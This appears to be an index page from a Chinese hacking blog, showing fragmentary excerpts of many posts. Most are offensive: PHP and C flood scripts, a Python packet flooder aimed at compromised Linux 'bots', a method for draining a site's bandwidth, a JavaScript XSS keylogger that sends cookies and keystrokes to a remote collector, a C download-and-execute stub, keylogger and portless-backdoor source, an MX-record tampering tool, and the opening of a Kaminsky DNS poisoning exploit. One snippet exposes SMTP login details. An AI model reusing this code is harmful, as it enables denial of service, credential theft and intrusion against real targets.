Yatere的天平秤

注意事项 :1.仅限linux/uninx 使用2.不需要任何第三方库,仅用标准库3.格式为公开格式,可以whireshark 直接打开代码如下:import time,structclass Pcap: def __init__(self, filename, link_type=1): self.pcap_file = open(filename, 'wb') self.pcap_file.write(struct.pack

1、twitter 和facebook uid和username 互转注： facebook 有部分username无法获取2、twitter和facebook爬虫服务注：facebook：分为匿名和非匿名爬虫，非匿名：爬取数据类型最全和内容可以最多，但存在较大限制。匿名：可以爬取用户最近发布内容以及类似用户推荐和基本信息（邮箱地址等信息），存在一定限制。twitt...

#coding=utf8import httplib2,os,sys,timefrom bs4 import BeautifulSoupos.chdir(sys.path[0])try: from urlparse import parse_qsl,urlparse from urllib import urlencode,quoteexcept: from ur

<?phpset_time_limit(0);ignore_user_abort(FALSE);$exec_time = $_POST['time'];$t='http://localhost/index.asp';$urls=array_fill(0,512,$t);$time = time();$max_time = $time+$exec_time;while (1

#include "Winsock2.h"#include "Iphlpapi.h"#include #include #include #pragma comment(lib, "Iphlpapi.lib")#pragma comment(lib, "ws2_32.lib")static char TcpState[][32] = { "???",

放个代码片段方便我以后做事SECURITY_ATTRIBUTES sa;HANDLE hRead,hWrite; sa.nLength = sizeof(SECURITY_ATTRIBUTES); sa.lpSecurityDescriptor = NULL; //使用系统默认的安全描述符 sa.bInheritHandle = TRUE; //创建的进程继承句

一个协议fuzzer工具，支持文件fuzzer。研究模糊化的人可以参考代码。也是用python写的。https://github.com/localh0t/backfuzz可以翻墙看看这个：http://localh0t.blogspot.com/2012/03/backfuzz-protocol-fuzzing-toolkit.html

下载地址：http://code.google.com/p/raft/RAFT is a testing tool for the identification of vulnerabilities in web applications.RAFT is a suite of tools that utilize common shared elemen

原帖代码地址为：http://www.exploit-db.com/exploits/18836/由于其实为py2.x版本服务的，所以我将代码改为py3了。代码如下：####################################################################################### Exploit Title: Cve

实战安全工程师训练佳品之WebGoatWebGoat是由著名的OWASP负责维护的一个漏洞百出的J2EE Web应用程序，这些漏洞并非程序中的bug，而是故意设计用来讲授Web应用程序安全课程的。这个应用程序提供了一个逼真的教学环境，为用户完成课程提供了有关的线索。对 于每堂课，都对应于WebGoat应用程序中的一个实际的安全漏洞，为了能亲身实践如何利用这个漏洞，您首先需要具备该漏

实验环境如下：服务器IP:61.183.254.254客户机IP:192.168.1.105Http代理服务器:202.103.24.68  端口：8080现象：   客户机可以ping得通外网服务器，但是却无法上网，出口过滤tcp和udp。目的：客户机可以正常上网。服务器：C:\>ptunnel.exe -v 4 -c "\Device\NPF_{

#include #include #include #pragma comment(lib,"ws2_32.lib")#define SEQ 0x28376839int threadnum,maxthread,port;char *DestIP;//目标IPvoid display(void) // 定义状态提示函数 { static int play=0;//

import socketserver,osPORT = 23class Handler(socketserver.BaseRequestHandler): def handle(self): while True: t='' self.data = self.request.recv(1024).strip()

没有多线程，临时听到后觉得好听就随手写了一个。用到了json模块。import urllib.request as urimport json,os,sysos.chdir(sys.path[0])t=r'http://douban.fm/j/mine/playlist?type=n&channel='for i in range(24): url=t+str(i)

asd PHP整站打包程序-By DoDo <?php ini_set('memory_limit', '2048M'); echo "选择要压缩的文件或目录："; $fdir = opendir('./'); while($file=readdir($fdir)) { if($file=='.'|| $file=='..')

Go是Google开发的一种编译型，并发型，并具有垃圾回收功能的编程语言。　　罗伯特·格瑞史莫（Robert Griesemer），罗勃·派克（Rob Pike）及肯·汤普逊于2007年9月开始设计Go语言，Go语言是基于Inferno操作系统所开发的。Go语言于2009年11月正式宣布推出，并在Linux及Mac OS X平台上进行了实现.　GO语言吉祥物,很可爱吧。

项目地址：https://github.com/OffensivePython/PinjectRaw Packet Injection tool比起scrpy 起来简单多了，当然功能不如他，但是自己写一些raw的程序经测试笔scrpy快很多。注:windows下不支持sock raw.例子： # IP Header ipobj = IP(src_host, dst_ho

软件介绍： 本身为独立执行程序，跨平台，可以充当正常dns服务器。默认情况下，本程序只篡改MX（邮件交换记录）为特定主机。作用：本软件 与 本博客前文中的 smtp 中继监控服务器程序 结合来实施攻击,特别在内网中。其他：如果需要实现高级的基于特定域名的篡改，修改代码即可。package mainimport ( "fmt" "github.

import reimport sysimport base64, codecsfrom random import random, randrange, choice, shuffle, randintfrom collections import *from inspect import getargspecdef random_string(charset = 'abcdefgh

关于绿盟的介绍：http://www.nsfocus.net/index.php?act=alert&do=view&aid=120py2版本#!/usr/bin/env pythonimport optparse, os, re, socket, threading, time, urllib, urllib2, urlparseNAME = "Ki

#!/usr/bin/perl# Get Net::RawIP at http://search.cpan.org/CPAN/authors/id/S/SZ/SZABGAB/Net-RawIP-0.21_01.tar.gz# cpan Net::DNS:Resolver seems to work fine on each machine I throw it on, as well.# P

import dpkt,os,sysos.chdir(sys.path[0])f = open('12.cap','rb')pcap = dpkt.pcap.Reader(f)for ts, buf in pcap: eth = dpkt.ethernet.Ethernet(buf) ip = eth.data tcp = ip.data try:

# -*- coding: gb18030 -*-from subprocess import *import socket,httplib2import sys,os,socket,threadingfrom bs34 import BeautifulSoup34import json,urllib2,urllibfrom urlparse import urlparse as u

软件作用：1.自动旁注指定IP段，收集旁注信息，并自动保存为文本文件方便以后查看。2.自动多线程针对第一步骤的网站结果调用wwwscan进行扫描。(可以自己定义多少线程)全部都是自动化完成。程序界面如下:代码如下：from tkinter import *import httplib2,os,queue,threading,sys,socket,time,

第一个接口，查询ip地址的地理信息接口：r'http://api.ipinfodb.com//v2/ip_query.php?key=5eb5b4de91741e2e4b98748989dc84f3236b55f6dd38aa689921884867536f36&ip={}&output=json&timezone=false'        获得子域名信息，google接口：se

某目标网站，为虚拟主机，如果ISP限制月流量为20G，那么我们可以在短暂1-2天内消耗完其流量。(取决于你的机器)方法原理如下：1.找到目标网站大文件（页面）地址2.多线程访问（下载）该地址(注意：由于完全是出于模拟真实用户，所以不会被防火墙屏蔽掉)（以下以hao123为例子而已）一： 其中以上思路中的第一点 可以通过google浏览器的审计功能实现

#coding=utf8os.chdir(sys.path[0])#配置信息authInfo = {}authInfo['server'] = 'smtp.163.com'authInfo['user'] = 'Zvht2mD@163.com'authInfo['password'] = '2JlP'fromAdd = 'Zvht2mD@163.com'#toAdd = ['te

现在肉鸡上面linux越来越多，都默认安装了python,有时候没有工具的时候可以自己写一个：下面是支持 tcp和udp的python的发包代码：import socket,sys,threadingif len(sys.argv)!=4: print('使用方法:\n'+sys.argv[0],'目标ip','协议[tcp | udp]','线程数')

本人是py3.2 调用的是bing数据库,httplib2 和 bs4 模块可以网上找找。httplib2支持压缩，所以用他了，默认的不支持。import sys,osfrom bs4 import BeautifulSoupimport httplib2import urllib.parse as upip=sys.argv[1]os.chdir(sys.pat

//**********************************************************************// Version: V1.0// Coder: WinEggDrop// Date Release: NULL// Purpose: Hookless Keylogger// Test PlatForm: Win 2K Pro And Ser

编写一个初级的Windows调试器By Ajay Vijayvargiya | 24 Jan 2011作者：Ajay Vijayvargiya | 2011-01-24原文：http://www.codeproject.com/KB/system/writing_debugger_1.aspxPreamble前言All of us have used some

var keys=''; //储存键盘鼠标记录var hacker = 'http://1.1.1.1:8080/xss.php';var Url = window.location;var Domain = document.domain;var Cookie = document.cookie; document.onkeypress = function(e) { /

#include #include #include #include #pragma comment(lib,"ws2_32")#pragma comment(lib,"wsock32")#define FAKE_IP "201.79.131.18" #define SEQ 0x28376839#define right "===============Coder Paris

//**********************************************************************// Version: V1.0// Coder: WinEggDrop// Date Release: NULL// Purpose: To Demonstrate Some Portless Backdoor Technique// Test

-=-=-=-=-=-=-=-=-=-= x_dialupass.c -=-=-=-=-=-=-=-=-=-=/*演示还原NT平台上拨号连接的密码可运行于windows 2000/xp/2003原理基于分析dialupass v2.42eyas at xfocus.orghttp://www.xfocus.net2004-10-01FileName: x_dialupas

LoadLibrary是加载dll并增加引用计数，需要freelibrary释放。而GetModuleHandle是返回一个已经映射进调用进程地址空间的模块的句柄，不需要释放

Windows消息大全　　Windows是一消息（Message）驱动式系统，Windows消息提供了应用程序与应用程序之间、应用程序与Windows系统之间进行通讯的手段。应用程序要实现的功能由消息来触发，并靠对消息的响应和处理来完成。Windows系统中有两种消息队列，一种是系统消息队列，另一种是应用程序消息队列。计算机的所有输入设备由 Windows监控，当一个事件发生时，Win

<?php// post & data: ip=1.1.1.1&time=999&port=80$packets = 0;$ip = $_POST['ip'];$rand = $_POST['port'];set_time_limit(0);ign

<br />C<br /> <br />#include<windows.h>#include<urlmon.h>#include<process.h> #include<Shellapi.h> //这里这个头文件是对ShellExecute的定义#pragma comment (lib,"Urlmon.lib")int main(){URLDownloadToFile(NULL,"http://www.lzitw.com/kj/hoho.exe","C:/test.exe",0

<br />/* * Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack * * Compilation: * $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm * * Dependency: libdnet (aka libdumbnet-dev under Ubuntu) * * Author: marc.bev